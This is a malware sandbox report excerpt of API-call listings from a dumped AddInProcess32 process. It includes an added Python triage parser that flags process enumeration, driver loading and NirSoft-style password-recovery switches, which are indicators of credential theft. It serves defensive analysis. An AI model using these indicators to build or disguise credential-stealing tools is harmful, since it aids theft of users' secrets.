                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                  • API String ID: 667068680-2887671607
                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 1043902810-0
                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                  APIs
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                  APIs
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                  • String ID: ---
                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 1010922700-0
                                                                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                  • free.MSVCRT ref: 004186C7
                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                  • free.MSVCRT ref: 004186E0
                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                  • free.MSVCRT ref: 00418716
                                                                                                  • free.MSVCRT ref: 0041872A
                                                                                                  • free.MSVCRT ref: 00418749
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                  • String ID: |A
                                                                                                  • API String ID: 3356672799-1717621600
                                                                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 2012295524-70141382
                                                                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
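The blocks in this listing are Joe Sandbox's per-function summaries of the AddInProcess32 memory dump (process 29, snapshot hcaresult_29_2_400000_AddInProcess32.jbxd): the API calls each recovered function makes with their call-site addresses, the strings it references, and the opcode/instruction fuzzy hashes used for similarity matching. The triage-relevant detail sits in the GetProcAddress clusters, which show the code resolving exports at run time rather than importing them: ntdll.dll's NtSuspendProcess/NtResumeProcess, NtLoadDriver/NtUnloadDriver and NtQuerySystemInformation; psapi.dll's EnumProcesses, EnumProcessModules and GetModuleBaseNameW; and kernel32's CreateToolhelp32Snapshot/Process32First/Process32Next. The _wcsicmp block that compares against /scomma, /shtml, /skeepass, /stab, /stabular, /sverhtml and /sxml matches the standard save-format switches of NirSoft's command-line password-recovery utilities, the usual sign of an embedded recovery tool's argument parser. The parser below is added here and is not part of the report or of Joe Sandbox: it turns such blocks into records, extracts the dynamically resolved names and the DLL they come from, and maps them to capability flags. Its input is an abridged copy of four blocks from this listing; it assumes the report's conventions that unknown or constant arguments print as `?` or an 8-digit hex placeholder and that String ID entries are joined with `$`.

```python
"""Parse Joe Sandbox function blocks (the 'APIs / Strings / Similarity'
listing above) and pull out the names the code resolves at run time via
GetProcAddress, the DLL they come from, and the string clusters it compares.
Added example for this page, not Joe Sandbox tooling."""
import re
from collections import namedtuple

# Constructed input: four blocks copied (abridged) from the listing above,
# with the report's leading indentation removed.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Process32First$kernel32.dll
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
APIs
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Similarity
• String ID: EnumProcesses$psapi.dll
APIs
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Similarity
• String ID: NtLoadDriver$NtResumeProcess$NtSuspendProcess$ntdll.dll
APIs
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
"""

# One call bullet: '• Func.MODULE(args), ref: ADDR', optionally prefixed with
# 'Part of subcall function ADDR:'; argument list may be absent ('memset.MSVCRT ref: ...').
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<func>[^.(]+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")   # 'API ID: ...', 'Opcode ID: ...'
HEX8 = re.compile(r"^[0-9A-F]{8}$")                             # placeholder for a constant/unknown arg
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")                  # an export name worth keeping
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
Call = namedtuple("Call", "func module args ref subcall")

def parse_blocks(text):
    """Split the listing into {'calls': [Call], 'meta': {...}}; each block starts at 'APIs'."""
    blocks, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                cur = {"calls": [], "meta": {}}
                blocks.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = CALL_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                cur["calls"].append(Call(m["func"], m["mod"], args, m["ref"], m["sub"] or ""))
            continue
        m = KV_RE.match(line)          # metadata bullets in the other sections
        if m:
            cur["meta"][m["key"].strip()] = m["val"].strip()
    return blocks

def string_ids(block):
    # Joe Sandbox joins the list with '$'; a literal '$' inside a string cannot
    # be told apart from the separator, so treat the result as hints only.
    return [s for s in block["meta"].get("String ID", "").split("$") if s]

def dynamic_imports(block):
    """Export names passed to GetProcAddress by this function itself (subcalls excluded)."""
    names = []
    for c in block["calls"]:
        if c.func == "GetProcAddress" and not c.subcall:
            names += [a for a in c.args if IDENT.match(a) and not HEX8.match(a)]
    return names

def resolved_modules(block):
    return [s for s in string_ids(block) if s.lower().endswith(".dll")]

def triage(text):
    """One record per block that carries a String ID or resolves exports dynamically."""
    records = []
    for b in parse_blocks(text):
        imports = dynamic_imports(b)
        if imports or "String ID" in b["meta"]:
            records.append({"modules": resolved_modules(b), "imports": imports,
                            "strings": string_ids(b), "opcode_id": b["meta"].get("Opcode ID")})
    return records

# Standard save-format switches of NirSoft's command-line recovery utilities.
NIRSOFT_SWITCHES = {"/stext", "/stab", "/scomma", "/stabular", "/shtml",
                    "/sverhtml", "/sxml", "/skeepass"}

def capability_flags(records):
    """Map the recovered names onto the capabilities a triager would report."""
    flags = set()
    for r in records:
        names = set(r["imports"]) | set(r["strings"])
        if names & {"CreateToolhelp32Snapshot", "Process32First", "EnumProcesses"}:
            flags.add("process-enumeration")
        if names & {"NtSuspendProcess", "NtResumeProcess"}:
            flags.add("process-suspend-resume")
        if names & {"NtLoadDriver", "NtUnloadDriver"}:
            flags.add("driver-load")
        if len(set(r["strings"]) & NIRSOFT_SWITCHES) >= 3:
            flags.add("nirsoft-style-output-switches")
    return flags
```

Run `triage(SAMPLE)` on the whole function listing instead of the excerpt and the records give you, per function, which DLL it loads and which exports it resolves by name; `capability_flags` is deliberately keyed on names rather than on the Opcode ID hashes, because the hashes identify this build only, while a different packer or build of the same family resolves the same names.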
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Strings
Memory Dump Source
• Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
• Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                  APIs
                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1700100422-0
